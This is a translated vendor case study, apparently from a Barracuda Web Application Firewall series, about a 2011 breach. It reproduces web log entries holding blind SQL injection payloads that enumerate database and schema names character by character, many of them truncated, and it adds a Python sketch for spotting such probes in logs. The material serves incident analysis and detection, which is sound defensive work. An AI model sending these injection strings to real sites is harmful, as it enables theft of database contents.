Barracuda Web Application Firewall Data Leak Prevention Case Study Series (Part 1)


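This article examines how the data breach happened, what lessons we drew from it, and how the Barracuda Web Application Firewall blocks in-progress application-layer attacks and effectively prevents further damage.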

Source: ZDNET Security Channel, February 8, 2012

Keywords: data breach, Web application firewall, Barracuda


  How the data breach unfolded

  From the Barracuda Web Application Firewall logs, we confirmed that the unauthorized user probed and attacked the website from two clients:

  

  [Image: Barracuda Web Application Firewall Data Leak Prevention Case Study Series (Part 1)]

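  Using the information reported by the Barracuda Web Application Firewall, we were able to quickly filter the web server logs and locate the corresponding entries.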

  2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=99%20and%20”x”=”x 80 - 87.1

  2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=98%20and%20”x”=”x 80 - 87.1

  2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=97%20and%20”x”=”x 80 - 87.1

  2011-04-10 03:19:19 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:21 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:24 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:26 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:28 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:31 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:32 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:33 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:37 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:39 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:41 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:46 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:49 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:52 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

  2011-04-10 03:19:55 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

  Note: The web logs use Greenwich Mean Time (GMT), while the Web Application Firewall uses Pacific Daylight Time (PDT).
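  The filtering step described above can be sketched as follows. This is an added example, not code from the article or from Barracuda: it converts a WAF alert time from PDT to GMT and groups the character-by-character and length probes in the web log by client and path. The field layout is inferred from the excerpt; the sample lines, client addresses, complete `Length` query and WAF alert time are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample in the layout of the excerpt above: date, time, method,
# path, query, port, user, client IP. The addresses are documentation values.
SAMPLE_LOG = """\
2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=12"%20and%20ascii(substring((database()),13,1))=99%20and%20"x"="x 80 - 192.0.2.10
2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12"%20and%20ascii(substring((database()),13,1))=98%20and%20"x"="x 80 - 192.0.2.10
2011-04-10 03:19:20 GET /ns/customers/index.php - 80 - 192.0.2.77
2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=12"%20and%20Length((database()))=5%20and%20"x"="x 80 - 192.0.2.10
"""

# One character position compared against one ASCII code, or a length test.
CHAR_PROBE = re.compile(r"ascii\(substring\(.+,(\d+),1\)\)\s*=\s*(\d+)", re.I)
LEN_PROBE = re.compile(r"length\(.+\)\s*=\s*(\d+)", re.I)
FMT = "%Y-%m-%d %H:%M:%S"

def pdt_to_gmt(waf_time):
    """Shift a WAF timestamp (PDT, UTC-7) to the GMT used by the web log."""
    return (datetime.strptime(waf_time, FMT) + timedelta(hours=7)).strftime(FMT)

def find_probes(log_text, start_gmt, end_gmt):
    """Return {(client, path): [(kind, position, guess), ...]} inside the window."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 8:
            continue  # truncated or malformed entry: cannot attribute it
        stamp, path, query, client = f"{f[0]} {f[1]}", f[3], unquote(f[4]), f[7]
        if not start_gmt <= stamp <= end_gmt:
            continue
        char, length = CHAR_PROBE.search(query), LEN_PROBE.search(query)
        if char:
            hits[(client, path)].append(("char", int(char[1]), int(char[2])))
        elif length:
            hits[(client, path)].append(("length", None, int(length[1])))
    return dict(hits)

if __name__ == "__main__":
    start = pdt_to_gmt("2011-04-09 20:19:00")  # constructed WAF alert time
    for (client, path), probes in find_probes(SAMPLE_LOG, start, "2011-04-10 03:20:00").items():
        print(client, path, len(probes), "probes:", probes)
```

  Many requests from one client that differ only in the guessed value for the same position are the signature to alert on; a single match is weaker evidence.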

  By carefully examining each log entry on the Barracuda Web Application Firewall, we found clues about the attacker and the tools used:

  

  [Image: Barracuda Web Application Firewall Data Leak Prevention Case Study Series (Part 1)]
